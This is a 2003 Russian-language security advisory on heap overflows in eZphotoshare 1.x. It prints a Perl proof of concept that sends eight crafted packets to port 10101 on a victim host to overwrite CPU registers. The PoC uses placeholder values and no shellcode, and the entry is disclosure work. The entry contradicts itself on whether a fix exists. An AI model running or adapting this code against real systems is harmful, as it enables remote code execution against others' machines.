| Дата публикации: | 05.12.2003 |
| Всего просмотров: | 1209 |
| Опасность: | Средняя |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Локальная сеть |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | eZphotoshare 1.x |
| Уязвимые версии: eZphotoshare
Описание: Несколько переполнений буфера обнаружено в eZphotoshare. Удаленный пользователь может выполнить произвольный код на целевой системе. Удаленный пользователь моежет послать специально обработанный 80 байтовый пакет к 10101 порту последовательно 8 раз, чтобы перезаписать ECX и EAX регистры и выполнить произвольный код с привилегиями текущего пользователя. Пример/Эксплоит:
#!/usr/bin/perl -w
# Heap Corruption Vulnerability in eZphotoshare PoC
# - by Peter Winter-Smith [peter4020@hotmail.com]
use IO::Socket;
if(!($ARGV[0]))
print "Usage: eZpsheap.pl <victim>\n\n";
exit;
print "Heap Corruption PoC\n";
for($n=1;$n<9;$n++){
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"10101")
or die "Unable to connect to $ARGV[0] on port
10101";
$eax = "ABCD";
$ecx = "XXXX";
$packet = "GET /aaa" . $eax . $ecx . "a"x64;
print $victim $packet;
print " + Sending packet number $n of 8 ...\n";
sleep(1);
close($victim); }
print "Done.\n";
exit;
URL производителя: http://www.ezphotoshare.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | eZphotoshare Multiple Overflow Vulnerabilities |